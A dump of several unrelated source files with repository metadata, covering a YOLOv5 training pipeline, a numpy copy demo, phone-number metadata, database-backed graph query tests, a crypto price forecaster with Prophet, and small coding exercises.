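                    outputs=("pred_s", "pred_m", "pred_l"))
    raw = [torch.zeros(1, 80, 80, 3, 85), torch.zeros(1, 40, 40, 3, 85),
           torch.zeros(1, 20, 20, 3, 85)]
    return [t.shape for t in op.forward(raw, state={})]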
class ComputeLoss(TensorOp):
def __init__(self, inputs, outputs, img_size=640, mode=None):
super().__init__(inputs=inputs, outputs=outputs, mode=mode)
self.BCEcls = nn.BCEWithLogitsLoss(reduction="none")
self.BCEobj = nn.BCEWithLogitsLoss(reduction="none")
self.img_size = img_size
def forward(self, data, state):
pred, true = data
true_box, true_obj, true_class = torch.split(true, (4, 1, true.size(-1) - 5), dim=-1)
pred_box, pred_obj, pred_class = torch.split(pred, (4, 1, pred.size(-1) - 5), dim=-1)
num_classes = pred_class.size(-1)
true_class = torch.squeeze(torch.nn.functional.one_hot(true_class.long(), num_classes), -2).half()
box_scale = 2 - 1.0 * true_box[..., 2:3] * true_box[..., 3:4] / (self.img_size**2)
iou = torch.unsqueeze(self.bbox_iou(pred_box, true_box, giou=True), -1)
iou_loss = (1 - iou) * true_obj * box_scale
conf_loss = self.BCEobj(pred_obj, true_obj)
class_loss = true_obj * self.BCEcls(pred_class, true_class)
iou_loss = torch.mean(torch.sum(iou_loss, (1, 2, 3, 4)))
conf_loss = torch.mean(torch.sum(conf_loss, (1, 2, 3, 4)))
class_loss = torch.mean(torch.sum(class_loss, (1, 2, 3, 4)))
return iou_loss, conf_loss, class_loss
@staticmethod
def bbox_iou(bbox1, bbox2, giou=False, diou=False, ciou=False, epsilon=1e-7):
b1x1, b1x2, b1y1, b1y2 = bbox1[..., 0], bbox1[..., 0] + bbox1[..., 2], bbox1[..., 1], bbox1[..., 1] + bbox1[..., 3]
b2x1, b2x2, b2y1, b2y2 = bbox2[..., 0], bbox2[..., 0] + bbox2[..., 2], bbox2[..., 1], bbox2[..., 1] + bbox2[..., 3]
# intersection area
inter = (torch.min(b1x2, b2x2) - torch.max(b1x1, b2x1)).clamp(0) * \
(torch.min(b1y2, b2y2) - torch.max(b1y1, b2y1)).clamp(0)
# union area
w1, h1 = b1x2 - b1x1 + epsilon, b1y2 - b1y1 + epsilon
w2, h2 = b2x2 - b2x1 + epsilon, b2y2 - b2y1 + epsilon
union = w1 * h1 + w2 * h2 - inter + epsilon
# iou
iou = inter / union
if giou or diou or ciou:
cw = torch.max(b1x2, b2x2) - torch.min(b1x1, b2x1) # convex (smallest enclosing box) width
ch = torch.max(b1y2, b2y2) - torch.min(b1y1, b2y1) # convex height
if ciou or diou: # Distance or Complete IoU https://arxiv.org/abs/1911.08287v1
c2 = cw**2 + ch**2 + epsilon # convex diagonal squared
rho2 = ((b2x1 + b2x2 - b1x1 - b1x2)**2 + (b2y1 + b2y2 - b1y1 - b1y2)**2) / 4 # center distance squared
if diou:
return iou - rho2 / c2 # DIoU
elif ciou: # https://github.com/Zzh-tju/DIoU-SSD-pytorch/blob/master/utils/box/box_utils.py#L47
v = (4 / math.pi**2) * torch.pow(torch.atan(w2 / h2) - torch.atan(w1 / h1), 2)
with torch.no_grad():
alpha = v / (v - iou + (1 + epsilon))
return iou - (rho2 / c2 + v * alpha) # CIoU
else: # GIoU https://arxiv.org/pdf/1902.09630.pdf
c_area = cw * ch + epsilon # convex area
return iou - (c_area - union) / c_area # GIoU
else:
return iou # IoU
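# Quick illustrative check (helper added here, not in the original file):
# two identical x1, y1, w, h boxes give an IoU of (almost exactly) 1, and the
# GIoU variant collapses to plain IoU when the boxes coincide.
def _bbox_iou_demo():
    box = torch.tensor([[10.0, 10.0, 20.0, 20.0]])
    return (ComputeLoss.bbox_iou(box, box),
            ComputeLoss.bbox_iou(box, box, giou=True))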
class PredictBox(TensorOp):
def __init__(self, inputs, outputs, mode, width, height, max_outputs=500, conf_threshold=0.4):
super().__init__(inputs=inputs, outputs=outputs, mode=mode)
self.width = width
self.height = height
self.max_outputs = max_outputs
self.conf_threshold = conf_threshold
def forward(self, data, state):
conv_sbbox, conv_mbbox, conv_lbbox = data
batch_size = conv_sbbox.shape[0]
final_results = []
for idx in range(batch_size):
pred_s, pred_m, pred_l = conv_sbbox[idx], conv_mbbox[idx], conv_lbbox[idx]
pred_s, pred_m, pred_l = pred_s.view(-1, 85), pred_m.view(-1, 85), pred_l.view(-1, 85)
preds = torch.cat([pred_s, pred_m, pred_l], dim=0)
preds[:, 4] = torch.sigmoid(preds[:, 4]) # convert logits to confidence score
preds = preds[preds[:, 4] > self.conf_threshold] # filter by confidence
selected_boxes_all_classes = torch.zeros(0, 6).to(conv_sbbox.device)
if preds.size(0) > 0:
classes = torch.argmax(preds[:, 5:], dim=-1)
unique_classes = torch.unique(classes)
for clss in unique_classes:
preds_cls = preds[classes == clss]
x1, y1, w, h = preds_cls[:, 0], preds_cls[:, 1], preds_cls[:, 2], preds_cls[:, 3]
x2, y2 = x1 + w, y1 + h
conf_score, label = preds_cls[:, 4], classes[classes == clss]
selected_bboxes = torch.stack([x1, y1, x2, y2, conf_score, label.to(x1.dtype)], dim=-1)
nms_keep = torchvision.ops.nms(selected_bboxes[:, :4], selected_bboxes[:, 4], iou_threshold=0.35)
selected_bboxes = selected_bboxes[nms_keep]
selected_boxes_all_classes = torch.cat([selected_boxes_all_classes, selected_bboxes], dim=0)
# clamp values:
x1_abs = selected_boxes_all_classes[:, 0].clamp(0, self.width)
y1_abs = selected_boxes_all_classes[:, 1].clamp(0, self.height)
width_abs = torch.min((selected_boxes_all_classes[:, 2] - x1_abs).clamp(0), self.width - x1_abs)
height_abs = torch.min((selected_boxes_all_classes[:, 3] - y1_abs).clamp(0), self.height - y1_abs)
labels_score, labels = selected_boxes_all_classes[:, 4], selected_boxes_all_classes[:, 5]
results_single = [x1_abs, y1_abs, width_abs, height_abs, labels, labels_score, torch.ones_like(x1_abs)]
results_single = torch.stack(results_single, dim=-1)
# pad 0 to other rows to improve performance
results_single = torch.nn.functional.pad(results_single,
(0, 0, 0, self.max_outputs - results_single.size(0)))
final_results.append(results_single)
final_results = torch.stack(final_results)
return final_results
def lr_schedule_warmup(step, train_steps_epoch, init_lr):
warmup_steps = train_steps_epoch * 3
if step < warmup_steps:
lr = init_lr / warmup_steps * step
else:
lr = init_lr
return lr
def get_estimator(data_dir,
model_dir=tempfile.mkdtemp(),
epochs=200,
batch_size_per_gpu=32,
max_train_steps_per_epoch=None,
max_eval_steps_per_epoch=None):
num_device = get_num_devices()
train_ds, val_ds = mscoco.load_data(root_dir=data_dir)
train_ds = PreMosaicDataset(mscoco_ds=train_ds)
batch_size = num_device * batch_size_per_gpu
pipeline = fe.Pipeline(
train_data=train_ds,
eval_data=val_ds,
batch_size=batch_size,
ops=[
ReadImage(inputs=("image1", "image2", "image3", "image4"),
outputs=("image1", "image2", "image3", "image4"),
mode="train"),
ReadImage(inputs="image", outputs="image", mode="eval"),
LongestMaxSize(max_size=640,
image_in="image1",
bbox_in="bbox1",
bbox_params=BboxParams("coco", min_area=1.0),
mode="train"),
LongestMaxSize(max_size=640,
image_in="image2",
bbox_in="bbox2",
bbox_params=BboxParams("coco", min_area=1.0),
mode="train"),
LongestMaxSize(max_size=640,
image_in="image3",
bbox_in="bbox3",
bbox_params=BboxParams("coco", min_area=1.0),
mode="train"),
LongestMaxSize(max_size=640,
image_in="image4",
bbox_in="bbox4",
bbox_params=BboxParams("coco", min_area=1.0),
mode="train"),
LongestMaxSize(max_size=640,
image_in="image",
bbox_in="bbox",
bbox_params=BboxParams("coco", min_area=1.0),
mode="eval"),
PadIfNeeded(min_height=640,
min_width=640,
image_in="image",
bbox_in="bbox",
bbox_params=BboxParams("coco", min_area=1.0),
mode="eval",
border_mode=cv2.BORDER_CONSTANT,
value=(114, 114, 114)),
CombineMosaic(inputs=("image1", "image2", "image3", "image4", "bbox1", "bbox2", "bbox3", "bbox4"),
outputs=("image", "bbox"),
mode="train"),
CenterCrop(height=640,
width=640,
image_in="image",
bbox_in="bbox",
bbox_params=BboxParams("coco", min_area=1.0),
mode="train"),
Sometimes(
HorizontalFlip(image_in="image",
bbox_in="bbox",
bbox_params=BboxParams("coco", min_area=1.0),
mode="train")),
HSVAugment(inputs="image", outputs="image", mode="train"),
ToArray(inputs="bbox", outputs="bbox", dtype="float32"),
CategoryID2ClassID(inputs="bbox", outputs="bbox"),
GTBox(inputs="bbox", outputs=("gt_sbbox", "gt_mbbox", "gt_lbbox"), image_size=640),
Delete(keys=("image1", "image2", "image3", "image4", "bbox1", "bbox2", "bbox3", "bbox4", "bbox"),
mode="train"),
Delete(keys="image_id", mode="eval")
],
pad_value=0)
init_lr = 1e-2 / 64 * batch_size
model = fe.build(
lambda: YoloV5(w=640, h=640, c=3),
optimizer_fn=lambda x: torch.optim.SGD(x, lr=init_lr, momentum=0.937, weight_decay=0.0005, nesterov=True),
mixed_precision=True)
network = fe.Network(ops=[
RescaleTranspose(inputs="image", outputs="image"),
ModelOp(model=model, inputs="image", outputs=("pred_s", "pred_m", "pred_l")),
DecodePred(inputs=("pred_s", "pred_m", "pred_l"), outputs=("pred_s", "pred_m", "pred_l")),
ComputeLoss(inputs=("pred_s", "gt_sbbox"), outputs=("sbbox_loss", "sconf_loss", "scls_loss")),
ComputeLoss(inputs=("pred_m", "gt_mbbox"), outputs=("mbbox_loss", "mconf_loss", "mcls_loss")),
ComputeLoss(inputs=("pred_l", "gt_lbbox"), outputs=("lbbox_loss", "lconf_loss", "lcls_loss")),
Average(inputs=("sbbox_loss", "mbbox_loss", "lbbox_loss"), outputs="bbox_loss"),
Average(inputs=("sconf_loss", "mconf_loss", "lconf_loss"), outputs="conf_loss"),
Average(inputs=("scls_loss", "mcls_loss", "lcls_loss"), outputs="cls_loss"),
Average(inputs=("bbox_loss", "conf_loss", "cls_loss"), outputs="total_loss"),
PredictBox(width=640, height=640, inputs=("pred_s", "pred_m", "pred_l"), outputs="box_pred", mode="eval"),
UpdateOp(model=model, loss_name="total_loss")
])
traces = [
MeanAveragePrecision(num_classes=80, true_key='bbox', pred_key='box_pred', mode="eval"),
BestModelSaver(model=model, save_dir=model_dir, metric='mAP', save_best_mode="max")
]
lr_schedule = {
1:
LRScheduler(
model=model,
lr_fn=lambda step: lr_schedule_warmup(
step, train_steps_epoch=np.ceil(len(train_ds) / batch_size), init_lr=init_lr)),
4:
LRScheduler(
model=model,
lr_fn=lambda epoch: cosine_decay(
epoch, cycle_length=epochs - 3, init_lr=init_lr, min_lr=init_lr / 100, start=4))
}
traces.append(EpochScheduler(lr_schedule))
estimator = fe.Estimator(pipeline=pipeline,
network=network,
epochs=epochs,
traces=traces,
monitor_names=["bbox_loss", "conf_loss", "cls_loss"],
max_train_steps_per_epoch=max_train_steps_per_epoch,
max_eval_steps_per_epoch=max_eval_steps_per_epoch)
return estimator
|
[
"[email protected]"
] | |
6ced28b132958d66dd3e4dfcf2043949abc92e14
|
84f3814b595dd362188d8c3b8ba54f80031655a0
|
/tangyudi/base/numpy/numpy_4.py
|
25a2b556c6fc21f7b56e50277d00d9a482cdd965
|
[] |
no_license
|
qisionline/py_stu
|
56f1698aad1bc104e260e7d54f55b84aee193813
|
5bafb6296a1f583df2b43defc3061f7093079ab6
|
refs/heads/master
| 2023-06-20T00:06:22.793170 | 2021-07-05T07:06:24 | 2021-07-05T07:06:24 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 264 |
py
|
import numpy as np

a = np.arange(12)

# Plain assignment: b is just another name for the same array object.
b = a
print(b is a)  # True
b.shape = 3, 4
print(a.shape)  # reshaping through b also changes a (same object)
print(a)
print(b)
print(id(a))
print(id(b))  # identical ids: one object, two names

# view(): a new array object that shares the same underlying data buffer.
c = a.view()
print(c)
a.shape = 2, 6  # reshaping a does not change c's shape ...
print(a)
a[0, 4] = 55  # ... but writes through a are visible in c
print(a)
print(c)
print(c is a)  # False: different objects, shared data

# copy(): a deep copy with its own data; changes do not propagate back.
d = a.copy()
print(d is a)  # False
d[0, 0] = 9999
print(d)
print(a)  # a is unchanged
|
[
"[email protected]"
] | |
4ce8f9853c6437d81e11aaaef635f53fd238a39b
|
e4713c248c857b06a3cb0e9d0d15dd5513b1a8e9
|
/phonenumbers/shortdata/region_RS.py
|
4348b933951308ad6b2bb7bba8514682199003a3
|
[
"MIT",
"Apache-2.0"
] |
permissive
|
igushev/fase_lib
|
8f081e0f6b956b186dc759906b21dc3fc449f045
|
182c626193193b196041b18b9974b5b2cbf15c67
|
refs/heads/master
| 2023-05-14T14:35:05.727202 | 2022-04-15T23:55:37 | 2022-04-15T23:55:37 | 107,228,694 | 10 | 0 |
MIT
| 2023-05-01T19:38:09 | 2017-10-17T06:47:07 |
Python
|
UTF-8
|
Python
| false | false | 710 |
py
|
"""Auto-generated file, do not edit by hand. RS metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_RS = PhoneMetadata(id='RS', country_code=None, international_prefix=None,
general_desc=PhoneNumberDesc(national_number_pattern='[19]\\d{1,5}', possible_number_pattern='\\d{2,6}', possible_length=(2, 3, 4, 5, 6)),
emergency=PhoneNumberDesc(national_number_pattern='112|9[234]', possible_number_pattern='\\d{2,3}', example_number='112', possible_length=(2, 3)),
short_code=PhoneNumberDesc(national_number_pattern='1[189]\\d{1,4}|9[234]', possible_number_pattern='\\d{2,6}', example_number='112', possible_length=(2, 3, 4, 5, 6)),
short_data=True)
|
[
"[email protected]"
] | |
3e94df54d8c79bf66cff5bd9738907713285a1fb
|
4b44a299bafbd4ca408ce1c89c9fe4a449632783
|
/python3/06_Collections/02_Tuples/07_named_tuple_ops.py
|
7ab2152e8002aeee3c28dc99e29bece4712233ce
|
[] |
no_license
|
umunusb1/PythonMaterial
|
ecd33d32b2de664eaaae5192be7c3f6d6bef1d67
|
1e0785c55ccb8f5b9df1978e1773365a29479ce0
|
refs/heads/master
| 2023-01-23T23:39:35.797800 | 2020-12-02T19:29:00 | 2020-12-02T19:29:00 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 625 |
py
|
#!/usr/bin/python
"""
Purpose: Named Tuple ops
"""
from collections import namedtuple
Animal = namedtuple('Animal', 'name age type')
# Assignments
hen = Animal('hen', '2', 'bird')
# 0 1 2
print(hen)
hen = Animal(name='hen', age='2', type='bird')
print(hen)
hen = Animal(age='2', name='hen', type='bird')
print(hen)
# NOTE: even if the order of the keyword arguments changes, the fields are matched by name
# To get the field names
print(f'{hen._fields =}')
# Accessing values
print()
print('Access By position:', hen[2])
print('Access By key name:', hen.type)
# Converting to dictionary
print(f'{hen._asdict() =}')
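# Two more common namedtuple operations (added as an illustration):
# _replace returns a new tuple with selected fields changed, and _make
# builds a tuple from any iterable of values.
print(f'{hen._replace(age="3") =}')
print(f'{Animal._make(["duck", "1", "bird"]) =}')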
|
[
"[email protected]"
] | |
d8e4cca3c4419e249a3fa9dde38edfa30f51ecc2
|
ad13583673551857615498b9605d9dcab63bb2c3
|
/output/instances/msData/modelGroups/mgL001.py
|
96dfeffa0414c3a1c23c80c90bd58d8ab85b987f
|
[
"MIT"
] |
permissive
|
tefra/xsdata-w3c-tests
|
397180205a735b06170aa188f1f39451d2089815
|
081d0908382a0e0b29c8ee9caca6f1c0e36dd6db
|
refs/heads/main
| 2023-08-03T04:25:37.841917 | 2023-07-29T17:10:13 | 2023-07-30T12:11:13 | 239,622,251 | 2 | 0 |
MIT
| 2023-07-25T14:19:04 | 2020-02-10T21:59:47 |
Python
|
UTF-8
|
Python
| false | false | 87 |
py
|
from output.models.ms_data.model_groups.mg_l001_xsd.mg_l001 import Doc
obj = Doc(
)
|
[
"[email protected]"
] | |
99af65cd755f1a45ecd11c1d5788f55eb7defc0f
|
82c0a53e60106e978f8236fd42e4d2ed18d897d7
|
/data_anlys.py
|
dbb877dd43ed90b6eba8ba16d7595f95619b8d58
|
[] |
no_license
|
hasnatosman/data_visualization
|
c3691dd9f6fb25394725651c0500ee3bcd5ad7b1
|
34cf0483cddf450289c68135ec39201de3dd6311
|
refs/heads/main
| 2023-06-08T02:09:58.329997 | 2021-06-25T17:42:02 | 2021-06-25T17:42:02 | 380,313,450 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 72 |
py
|
import pandas as pd
df = pd.read_csv('pokemon_data.csv')
print(df)
|
[
"[email protected]"
] | |
0de9739f74e58c61be4f017af3e9f07f596a8e84
|
1a3228de688754e6c58f248eecfbfdd77c60e72f
|
/docs/test_asyncio.py
|
bc288e45631d8804ad67aab78bf222f8558c1f31
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
ArtemSerga/hiku
|
c38d8b4a4fe7ed780680dbe7969652233306a1a3
|
90e7cc50e2754d5dfdc06a6c2f5c6cc55e634566
|
refs/heads/master
| 2021-01-23T12:46:45.568208 | 2017-06-03T16:40:01 | 2017-06-03T16:40:01 | 93,199,117 | 0 | 0 | null | 2017-06-02T19:52:02 | 2017-06-02T19:52:02 | null |
UTF-8
|
Python
| false | false | 7,346 |
py
|
import uuid
import pytest
import asyncio
# setup storage
from sqlalchemy import MetaData, Table, Column
from sqlalchemy import Integer, String, ForeignKey, select
from sqlalchemy.sql.ddl import CreateTable
metadata = MetaData()
character_table = Table(
'character',
metadata,
Column('id', Integer, primary_key=True),
Column('name', String),
Column('species', String),
)
actor_table = Table(
'actor',
metadata,
Column('id', Integer, primary_key=True),
Column('name', String),
Column('character_id', ForeignKey('character.id'), nullable=False),
)
# setup test environment
import aiopg.sa
async def init_db(pg_dsn, *, loop):
db_name = 'test_{}'.format(uuid.uuid4().hex)
async with aiopg.sa.create_engine(pg_dsn, loop=loop) as db_engine:
async with db_engine.acquire() as conn:
await conn.execute('CREATE DATABASE {0}'.format(db_name))
return db_name
async def setup_db(db_dsn, *, loop):
async with aiopg.sa.create_engine(db_dsn, loop=loop) as db_engine:
async with db_engine.acquire() as conn:
await conn.execute(CreateTable(character_table))
await conn.execute(CreateTable(actor_table))
await conn.execute(character_table.insert().values([
dict(id=1, name='James T. Kirk', species='Human'),
dict(id=2, name='Spock', species='Vulcan/Human'),
dict(id=3, name='Leonard McCoy', species='Human'),
]))
await conn.execute(actor_table.insert().values([
dict(id=1, character_id=1, name='William Shatner'),
dict(id=2, character_id=2, name='Leonard Nimoy'),
dict(id=3, character_id=3, name='DeForest Kelley'),
dict(id=4, character_id=1, name='Chris Pine'),
dict(id=5, character_id=2, name='Zachary Quinto'),
dict(id=6, character_id=3, name='Karl Urban'),
]))
async def drop_db(pg_dsn, db_name, *, loop):
async with aiopg.sa.create_engine(pg_dsn, loop=loop) as db_engine:
async with db_engine.acquire() as conn:
await conn.execute('DROP DATABASE {0}'.format(db_name))
@pytest.fixture(scope='session', name='db_dsn')
def db_dsn_fixture(request):
loop = asyncio.get_event_loop()
pg_dsn = 'postgresql://postgres:postgres@postgres:5432/postgres'
db_name = loop.run_until_complete(init_db(pg_dsn, loop=loop))
db_dsn = 'postgresql://postgres:postgres@postgres:5432/{}'.format(db_name)
loop.run_until_complete(setup_db(db_dsn, loop=loop))
def fin():
loop.run_until_complete(drop_db(pg_dsn, db_name, loop=loop))
request.addfinalizer(fin)
return db_dsn
# define graph
from hiku.graph import Graph, Root, Node, Link
from hiku.types import TypeRef, Sequence
from hiku.engine import pass_context
from hiku.sources import aiopg as sa
SA_ENGINE_KEY = 'sa-engine'
character_query = sa.FieldsQuery(SA_ENGINE_KEY, character_table)
actor_query = sa.FieldsQuery(SA_ENGINE_KEY, actor_table)
character_to_actors_query = sa.LinkQuery(Sequence[TypeRef['actor']], SA_ENGINE_KEY,
from_column=actor_table.c.character_id,
to_column=actor_table.c.id)
async def direct_link(ids):
return ids
@pass_context
async def to_characters_query(ctx):
query = select([character_table.c.id])
async with ctx[SA_ENGINE_KEY].acquire() as conn:
rows = await conn.execute(query)
return [row.id for row in rows]
@pass_context
async def to_actors_query(ctx):
query = select([actor_table.c.id])
async with ctx[SA_ENGINE_KEY].acquire() as conn:
rows = await conn.execute(query)
return [row.id for row in rows]
GRAPH = Graph([
Node('character', [
sa.Field('id', character_query),
sa.Field('name', character_query),
sa.Field('species', character_query),
sa.Link('actors', character_to_actors_query, requires='id'),
]),
Node('actor', [
sa.Field('id', actor_query),
sa.Field('name', actor_query),
sa.Field('character_id', actor_query),
Link('character', TypeRef['character'],
direct_link, requires='character_id'),
]),
Root([
Link('characters', Sequence[TypeRef['character']],
to_characters_query, requires=None),
Link('actors', Sequence[TypeRef['actor']],
to_actors_query, requires=None),
]),
])
# test graph
import aiopg.sa
from hiku.engine import Engine
from hiku.result import denormalize
from hiku.readers.simple import read
from hiku.executors.asyncio import AsyncIOExecutor
async def execute(hiku_engine, sa_engine, graph, query_string):
query = read(query_string)
result = await hiku_engine.execute(graph, query, {SA_ENGINE_KEY: sa_engine})
return denormalize(graph, result, query)
@pytest.mark.asyncio(forbid_global_loop=True)
async def test_character_to_actors(db_dsn, event_loop):
hiku_engine = Engine(AsyncIOExecutor(event_loop))
async with aiopg.sa.create_engine(db_dsn, loop=event_loop) as sa_engine:
result = await execute(hiku_engine, sa_engine, GRAPH,
'[{:characters [:name {:actors [:name]}]}]')
assert result == {
'characters': [
{
'name': 'James T. Kirk',
'actors': [
{'name': 'William Shatner'},
{'name': 'Chris Pine'},
],
},
{
'name': 'Spock',
'actors': [
{'name': 'Leonard Nimoy'},
{'name': 'Zachary Quinto'},
],
},
{
'name': 'Leonard McCoy',
'actors': [
{'name': 'DeForest Kelley'},
{'name': 'Karl Urban'},
],
},
],
}
@pytest.mark.asyncio(forbid_global_loop=True)
async def test_actor_to_character(db_dsn, event_loop):
hiku_engine = Engine(AsyncIOExecutor(event_loop))
async with aiopg.sa.create_engine(db_dsn, loop=event_loop) as sa_engine:
result = await execute(hiku_engine, sa_engine, GRAPH,
'[{:actors [:name {:character [:name]}]}]')
assert result == {
'actors': [
{
'name': 'William Shatner',
'character': {'name': 'James T. Kirk'},
},
{
'name': 'Leonard Nimoy',
'character': {'name': 'Spock'},
},
{
'name': 'DeForest Kelley',
'character': {'name': 'Leonard McCoy'},
},
{
'name': 'Chris Pine',
'character': {'name': 'James T. Kirk'},
},
{
'name': 'Zachary Quinto',
'character': {'name': 'Spock'},
},
{
'name': 'Karl Urban',
'character': {'name': 'Leonard McCoy'},
},
],
}
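# Ad-hoc usage sketch (not part of the original tests; assumes the database
# prepared by `setup_db` above and a DSN in `db_dsn`): the same `execute`
# helper can be driven directly from a coroutine, outside of pytest.
#
# async def demo(db_dsn, loop):
#     hiku_engine = Engine(AsyncIOExecutor(loop))
#     async with aiopg.sa.create_engine(db_dsn, loop=loop) as sa_engine:
#         return await execute(hiku_engine, sa_engine, GRAPH,
#                              '[{:characters [:name :species]}]')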
|
[
"[email protected]"
] | |
e72c7937c256545ad06b5ab6bfadcaaa59a4f708
|
ab4de1c8caf95571be1e29e2c44272080cbf79be
|
/2018-07-10/diamantes.py
|
6d95056c2bf5fb62708f3684e794901c397e63a5
|
[] |
no_license
|
grupydf/dojos
|
f1c3cf7ad941b93efe875500e1bd18c914cfd372
|
ea79079a71dfb43b858acebc028de7f61b0e4177
|
refs/heads/master
| 2021-01-18T16:29:57.786827 | 2020-05-10T19:57:17 | 2020-05-10T19:57:17 | 20,621,041 | 5 | 6 | null | 2020-05-10T19:57:19 | 2014-06-08T16:38:55 |
Python
|
UTF-8
|
Python
| false | false | 862 |
py
|
"""
diamante('c')
a
b b
c c
b b
a
"""
listaTemp = []
abcedario = ['a', 'b', 'c', 'd', ]
alfabeto = 'abcdefghijklmnopqrstuvwxyz'
j = 0
lista2 = []
k = 0
def sequencia(letra):
index = alfabeto.find(letra)
lista = list(alfabeto[:index])
return lista + [letra] + lista[::-1]
"""
for i in alfabeto:
if letra != i:
listaTemp.append(i)
else:
listaTemp.append(i)
break
j=len(listaTemp)
j = j-1
lista2 = listaTemp.copy()
while j > k :
lista2.append(listaTemp[j-1])
j = j - 1
return lista2
"""
def test_sequence_a():
assert sequencia('a') == ['a']
def test_sequence_b():
assert sequencia('b') == ['a', 'b', 'a']
def test_sequence_c():
assert sequencia('c') == ['a', 'b', 'c', 'b', 'a']
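# Hedged sketch (not part of the original dojo solution): one way the
# `diamante` shown in the module docstring could be built on top of
# `sequencia`.
def diamante(letra):
    seq = sequencia(letra)
    largura = len(seq)
    for c in seq:
        i = alfabeto.find(c)
        linha = c if i == 0 else c + ' ' * (2 * i - 1) + c
        print(linha.center(largura))
# diamante('c')  # prints the 5-line diamond from the docstring at the top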
|
[
"[email protected]"
] | |
17111326eafe9c7e22bb9fbee83b1687511d8bd6
|
d55937a3fe1490c43f509267081a6ef0122131d1
|
/predictions.py
|
fbf2ca8d7907dffa70c5a48c492187da315e655b
|
[] |
no_license
|
kennethreitz/coinbin.org
|
e45abb9a00ae968365f057d7b0f44451d3ef52c7
|
bc3232fe5157363240a394a564d96f0500605e38
|
refs/heads/master
| 2022-05-26T01:02:16.111756 | 2018-01-12T22:20:19 | 2018-01-12T22:20:19 | 101,120,306 | 276 | 40 | null | 2018-01-12T22:20:20 | 2017-08-23T00:43:00 |
Python
|
UTF-8
|
Python
| false | false | 2,131 |
py
|
import time
import uuid
import records
import os
import maya
import numpy as np
import pandas as pd
# Matplotlib hack.
import matplotlib
matplotlib.use('agg')
import mpld3
from fbprophet import Prophet
from scraper import Coin, MWT, convert_to_decimal
PERIODS = 30
GRAPH_PERIODS = 365
@MWT(timeout=300)
def get_predictions(coin, render=False):
"""Returns a list of predictions, unless render is True.
Otherwise, returns the path of a rendered image.
"""
c = Coin(coin)
q = "SELECT date as ds, value as y from api_coin WHERE name=:coin"
db = records.Database()
rows = db.query(q, coin=c.name)
df = rows.export('df')
df['y_orig'] = df['y'] # to save a copy of the original data..you'll see why shortly.
# log-transform y
df['y'] = np.log(df['y'])
model = Prophet(weekly_seasonality=True, yearly_seasonality=True)
model.fit(df)
periods = PERIODS if not render else GRAPH_PERIODS
future_data = model.make_future_dataframe(periods=periods, freq='d')
forecast_data = model.predict(future_data)
if render:
matplotlib.pyplot.gcf()
fig = model.plot(forecast_data, xlabel='Date', ylabel='log($)')
return mpld3.fig_to_html(fig)
forecast_data_orig = forecast_data # make sure we save the original forecast data
forecast_data_orig['yhat'] = np.exp(forecast_data_orig['yhat'])
forecast_data_orig['yhat_lower'] = np.exp(forecast_data_orig['yhat_lower'])
forecast_data_orig['yhat_upper'] = np.exp(forecast_data_orig['yhat_upper'])
df['y_log'] = df['y'] #copy the log-transformed data to another column
df['y'] = df['y_orig'] #copy the original data to 'y'
# print(forecast_data_orig)
d = forecast_data_orig['yhat'].to_dict()
predictions = []
for i, k in enumerate(list(d.keys())[-PERIODS:]):
w = maya.when(f'{i+1} days from now')
predictions.append({
'when': w.slang_time(),
'timestamp': w.iso8601(),
'usd': convert_to_decimal(d[k]),
})
return predictions
if __name__ == '__main__':
print(get_predictions('btc'))
|
[
"[email protected]"
] | |
9d0105951ac244b0c59503e22b216fcdfab8e881
|
90c6262664d013d47e9a3a9194aa7a366d1cabc4
|
/tests/storage/cases/test_KT18vyxUB9haRHR4YLKizkbnsY8Wdm7C8JuA.py
|
d79748b5bc4a12c3f19b31fdefaf91282de497fa
|
[
"MIT"
] |
permissive
|
tqtezos/pytezos
|
3942fdab7aa7851e9ea81350fa360180229ec082
|
a4ac0b022d35d4c9f3062609d8ce09d584b5faa8
|
refs/heads/master
| 2021-07-10T12:24:24.069256 | 2020-04-04T12:46:24 | 2020-04-04T12:46:24 | 227,664,211 | 1 | 0 |
MIT
| 2020-12-30T16:44:56 | 2019-12-12T17:47:53 |
Python
|
UTF-8
|
Python
| false | false | 1,130 |
py
|
from unittest import TestCase
from tests import get_data
from pytezos.michelson.converter import build_schema, decode_micheline, encode_micheline, micheline_to_michelson
class StorageTestKT18vyxUB9haRHR4YLKizkbnsY8Wdm7C8JuA(TestCase):
@classmethod
def setUpClass(cls):
cls.maxDiff = None
cls.contract = get_data('storage/zeronet/KT18vyxUB9haRHR4YLKizkbnsY8Wdm7C8JuA.json')
def test_storage_encoding_KT18vyxUB9haRHR4YLKizkbnsY8Wdm7C8JuA(self):
type_expr = self.contract['script']['code'][1]
val_expr = self.contract['script']['storage']
schema = build_schema(type_expr)
decoded = decode_micheline(val_expr, type_expr, schema)
actual = encode_micheline(decoded, schema)
self.assertEqual(val_expr, actual)
def test_storage_schema_KT18vyxUB9haRHR4YLKizkbnsY8Wdm7C8JuA(self):
_ = build_schema(self.contract['script']['code'][0])
def test_storage_format_KT18vyxUB9haRHR4YLKizkbnsY8Wdm7C8JuA(self):
_ = micheline_to_michelson(self.contract['script']['code'])
_ = micheline_to_michelson(self.contract['script']['storage'])
|
[
"[email protected]"
] | |
e404d3c0651791aa020ed888a4d41d540052a404
|
acb8e84e3b9c987fcab341f799f41d5a5ec4d587
|
/langs/5/nco.py
|
d978a0c9ddb04b0df5db8a265cd41b474772a578
|
[] |
no_license
|
G4te-Keep3r/HowdyHackers
|
46bfad63eafe5ac515da363e1c75fa6f4b9bca32
|
fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2
|
refs/heads/master
| 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 486 |
py
|
import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'nCO':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1])
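# Illustrative input (the file name is hypothetical) -- lines are split on
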